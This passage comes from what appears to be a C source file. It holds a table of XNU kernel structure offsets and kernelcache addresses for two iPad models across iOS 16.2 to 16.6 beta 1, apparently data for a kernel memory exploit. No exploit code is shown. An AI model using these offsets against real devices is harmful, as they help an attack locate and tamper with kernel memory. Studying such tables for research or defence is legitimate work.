._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a2e9208, .kernelcache__gPhysBase = 0xfffffff0078f3fa0, .kernelcache__gPhysSize = 0xfffffff0078f3fa0 + 8, .kernelcache__gVirtBase = 0xfffffff0078f2178, .kernelcache__perfmon_devices = 0xfffffff00a327500, .kernelcache__perfmon_dev_open = 0xfffffff007ea5a88, .kernelcache__ptov_table = 0xfffffff0078a7160, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a326990, .kernelcache__vm_pages = 0xfffffff0078a3ea8, .kernelcache__vm_page_array_beginning_addr = 0xfffffff0078a6110, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a326988, .kernelcache__vn_kqfilter = 0xfffffff007ef463c, }, // iOS 16.5 { .kern_version = "Darwin Kernel Version 22.5.0: Mon Apr 24 21:10:51 PDT 2023; root:xnu-8796.122.4~1/RELEASE_ARM64_T8020", .build_version = "20F66", .device_id = "iPad11,4", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x730, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 8, .task__itk_space = 0x300, .task__object_size = 0x628, .thread__task_threads__next = 0x368 - 0x18, .thread__task_threads__prev = 0x368 - 0x18 + 8, .thread__map = 0x368, .thread__thread_id = 0x400, .thread__object_size = 0x4a8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x8, ._vm_map__hdr__links__next = 0x08 + 0x8, ._vm_map__hdr__links__start = 0x10 + 0x8, ._vm_map__hdr__links__end = 0x18 + 0x8, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a2f1288, .kernelcache__gPhysBase = 0xfffffff0078f80e0, .kernelcache__gPhysSize = 0xfffffff0078f80e0 + 8, .kernelcache__gVirtBase = 0xfffffff0078f62b8, .kernelcache__perfmon_devices = 0xfffffff00a32f500, .kernelcache__perfmon_dev_open = 0xfffffff007ea9c8c, .kernelcache__ptov_table = 0xfffffff0078ab160, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a32e990, .kernelcache__vm_pages = 0xfffffff0078a7ea8, .kernelcache__vm_page_array_beginning_addr = 0xfffffff0078aa110, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a32e988, .kernelcache__vn_kqfilter = 0xfffffff007ef8ad8, }, // iOS 16.6b1 { .kern_version = "Darwin Kernel Version 22.6.0: Tue May 9 06:18:00 PDT 2023; root:xnu-8796.140.12.502.1~12/RELEASE_ARM64_T8020", .build_version = "20G5026e", .device_id = "iPad11,4", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x730, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 8, .task__itk_space = 0x300, .task__object_size = 0x628, .thread__task_threads__next = 0x368 - 0x18, .thread__task_threads__prev = 0x368 - 0x18 + 8, .thread__map = 0x368, .thread__thread_id = 0x400, .thread__object_size = 0x4a8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x8, ._vm_map__hdr__links__next = 0x08 + 0x8, ._vm_map__hdr__links__start = 0x10 + 0x8, ._vm_map__hdr__links__end = 0x18 + 0x8, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a23dab0, .kernelcache__gPhysBase = 0xfffffff0078dc288, .kernelcache__gPhysSize = 0xfffffff0078dc288 + 8, .kernelcache__gVirtBase = 0xfffffff0078da440, .kernelcache__perfmon_devices = 0xfffffff00a27d530, .kernelcache__perfmon_dev_open = 0xfffffff007e7e434, .kernelcache__ptov_table = 0xfffffff00788f9a0, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a27c910, .kernelcache__vm_pages = 0xfffffff00788c0f8, .kernelcache__vm_page_array_beginning_addr = 0xfffffff00788e950, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a27c908, .kernelcache__vn_kqfilter = 0xfffffff007eccc44, }, // iPad 8th Gen Wifi // // iOS 16.2 { .kern_version = "Darwin Kernel Version 22.2.0: Mon Nov 28 20:10:15 PST 2022; root:xnu-8792.62.2~1/RELEASE_ARM64_T8020", .build_version = "20C65", .device_id = "iPad11,6", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x538, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 8, .task__itk_space = 0x300, .task__object_size = 0x628, .thread__task_threads__next = 0x368 - 0x18, .thread__task_threads__prev = 0x368 - 0x18 + 8, .thread__map = 0x368, .thread__thread_id = 0x400, .thread__object_size = 0x4a8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x8, ._vm_map__hdr__links__next = 0x08 + 0x8, ._vm_map__hdr__links__start = 0x10 + 0x8, ._vm_map__hdr__links__end = 0x18 + 0x8, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a0e1178, .kernelcache__gPhysBase = 0xfffffff0077ebc60, .kernelcache__gPhysSize = 0xfffffff0077ebc60 + 8, .kernelcache__gVirtBase = 0xfffffff0077e9e40, .kernelcache__perfmon_devices = 0xfffffff00a11c380, .kernelcache__perfmon_dev_open = 0xfffffff007e3b3ac, .kernelcache__ptov_table = 0xfffffff00779f248, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a11b800, .kernelcache__vm_pages = 0xfffffff00779c080, .kernelcache__vm_page_array_beginning_addr = 0xfffffff00779e208, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a11b7f8, .kernelcache__vn_kqfilter = 0xfffffff007e8da44, }, // iOS 16.3 { .kern_version = "Darwin Kernel Version 22.3.0: Wed Jan 4 21:24:51 PST 2023; root:xnu-8792.82.2~1/RELEASE_ARM64_T8020", .build_version = "20D47", .device_id = "iPad11,6", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x538, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 8, .task__itk_space = 0x300, .task__object_size = 0x628, .thread__task_threads__next = 0x368 - 0x18, .thread__task_threads__prev = 0x368 - 0x18 + 8, .thread__map = 0x368, .thread__thread_id = 0x400, .thread__object_size = 0x4a8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x8, ._vm_map__hdr__links__next = 0x08 + 0x8, ._vm_map__hdr__links__start = 0x10 + 0x8, ._vm_map__hdr__links__end = 0x18 + 0x8, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a0e1178, .kernelcache__gPhysBase = 0xfffffff0077e7d48, .kernelcache__gPhysSize = 0xfffffff0077e7d48 + 8, .kernelcache__gVirtBase = 0xfffffff0077e5f28, .kernelcache__perfmon_devices = 0xfffffff00a11c380, .kernelcache__perfmon_dev_open = 0xfffffff007e37398, .kernelcache__ptov_table = 0xfffffff00779b288, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a11b800, .kernelcache__vm_pages = 0xfffffff0077980c0, .kernelcache__vm_page_array_beginning_addr = 0xfffffff00779a248, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a11b7f8, .kernelcache__vn_kqfilter = 0xfffffff007e89a20, }, // iOS 16.3.1 { .kern_version = "Darwin Kernel Version 22.3.0: Wed Jan 4 21:24:51 PST 2023; root:xnu-8792.82.2~1/RELEASE_ARM64_T8020", .build_version = "20D67", .device_id = "iPad11,6", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x538, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 8, .task__itk_space = 0x300, .task__object_size = 0x628, .thread__task_threads__next = 0x368 - 0x18, .thread__task_threads__prev = 0x368 - 0x18 + 8, .thread__map = 0x368, .thread__thread_id = 0x400, .thread__object_size = 0x4a8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x8, ._vm_map__hdr__links__next = 0x08 + 0x8, ._vm_map__hdr__links__start = 0x10 + 0x8, ._vm_map__hdr__links__end = 0x18 + 0x8, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a0e1178, .kernelcache__gPhysBase = 0xfffffff0077e7d48, .kernelcache__gPhysSize = 0xfffffff0077e7d48 + 8, .kernelcache__gVirtBase = 0xfffffff0077e5f28, .kernelcache__perfmon_devices = 0xfffffff00a11c380, .kernelcache__perfmon_dev_open = 0xfffffff007e37398, .kernelcache__ptov_table = 0xfffffff00779b288, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a11b800, .kernelcache__vm_pages = 0xfffffff0077980c0, .kernelcache__vm_page_array_beginning_addr = 0xfffffff00779a248, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a11b7f8, .kernelcache__vn_kqfilter = 0xfffffff007e89a20, }, // iOS 16.4 { .kern_version = "Darwin Kernel Version 22.4.0: Mon Mar 6 20:42:48 PST 2023; root:xnu-8796.102.5~1/RELEASE_ARM64_T8020", .build_version = "20E246", .device_id = "iPad11,6", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x730, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 8, .task__itk_space = 0x300, .task__object_size = 0x628, .thread__task_threads__next = 0x368 - 0x18, .thread__task_threads__prev = 0x368 - 0x18 + 8, .thread__map = 0x368, .thread__thread_id = 0x400, .thread__object_size = 0x4a8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x8, ._vm_map__hdr__links__next = 0x08 + 0x8, ._vm_map__hdr__links__start = 0x10 + 0x8, ._vm_map__hdr__links__end = 0x18 + 0x8, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a19d208, .kernelcache__gPhysBase = 0xfffffff0078c3fa0, .kernelcache__gPhysSize = 0xfffffff0078c3fa0 + 8, .kernelcache__gVirtBase = 0xfffffff0078c2178, .kernelcache__perfmon_devices = 0xfffffff00a1db500, .kernelcache__perfmon_dev_open = 0xfffffff007e55a88, .kernelcache__ptov_table = 0xfffffff007877160, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a1da990, .kernelcache__vm_pages = 0xfffffff007873ea8, .kernelcache__vm_page_array_beginning_addr = 0xfffffff007876110, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a1da988, .kernelcache__vn_kqfilter = 0xfffffff007ea463c, }, // iOS 16.4.1 { .kern_version = "Darwin Kernel Version 22.4.0: Mon Mar 6 20:42:48 PST 2023; root:xnu-8796.102.5~1/RELEASE_ARM64_T8020", .build_version = "20E252", .device_id = "iPad11,6", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x730, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 8, .task__itk_space = 0x300, .task__object_size = 0x628, .thread__task_threads__next = 0x368 - 0x18, .thread__task_threads__prev = 0x368 - 0x18 + 8, .thread__map = 0x368, .thread__thread_id = 0x400, .thread__object_size = 0x4a8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x8, ._vm_map__hdr__links__next = 0x08 + 0x8, ._vm_map__hdr__links__start = 0x10 + 0x8, ._vm_map__hdr__links__end = 0x18 + 0x8, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a19d208, .kernelcache__gPhysBase = 0xfffffff0078c3fa0, .kernelcache__gPhysSize = 0xfffffff0078c3fa0 + 8, .kernelcache__gVirtBase = 0xfffffff0078c2178, .kernelcache__perfmon_devices = 0xfffffff00a1db500, .kernelcache__perfmon_dev_open = 0xfffffff007e55a88, .kernelcache__ptov_table = 0xfffffff007877160, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a1da990, .kernelcache__vm_pages = 0xfffffff007873ea8, .kernelcache__vm_page_array_beginning_addr = 0xfffffff007876110, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a1da988, .kernelcache__vn_kqfilter = 0xfffffff007ea463c, }, // iOS 16.5 { .kern_version = "Darwin Kernel Version 22.5.0: Mon Apr 24 21:10:51 PDT 2023; root:xnu-8796.122.4~1/RELEASE_ARM64_T8020", .build_version = "20F66", .device_id = "iPad11,6", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x730, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 8, .task__itk_space = 0x300, .task__object_size = 0x628, .thread__task_threads__next = 0x368 - 0x18, .thread__task_threads__prev = 0x368 - 0x18 + 8, .thread__map = 0x368, .thread__thread_id = 0x400, .thread__object_size = 0x4a8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x8, ._vm_map__hdr__links__next = 0x08 + 0x8, ._vm_map__hdr__links__start = 0x10 + 0x8, ._vm_map__hdr__links__end = 0x18 + 0x8, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a1a5288, .kernelcache__gPhysBase = 0xfffffff0078c80e0, .kernelcache__gPhysSize = 0xfffffff0078c80e0 + 8, .kernelcache__gVirtBase = 0xfffffff0078c62b8, .kernelcache__perfmon_devices = 0xfffffff00a1e3500, .kernelcache__perfmon_dev_open = 0xfffffff007e59c8c, .kernelcache__ptov_table = 0xfffffff00787b160, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a1e2990, .kernelcache__vm_pages = 0xfffffff007877ea8, .kernelcache__vm_page_array_beginning_addr = 0xfffffff00787a110, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a1e2988, .kernelcache__vn_kqfilter = 0xfffffff007ea8ad8, }, // iOS 16.6b1 { .kern_version = "Darwin Kernel Version 22.6.0: Tue May 9 06:18:00 PDT 2023; root:xnu-8796.140.12.502.1~12/RELEASE_ARM64_T8020", .build_version = "20G5026e", .device_id = "iPad11,6", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x730, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 8, .task__itk_space = 0x300, .task__object_size = 0x628, .thread__task_threads__next = 0x368 - 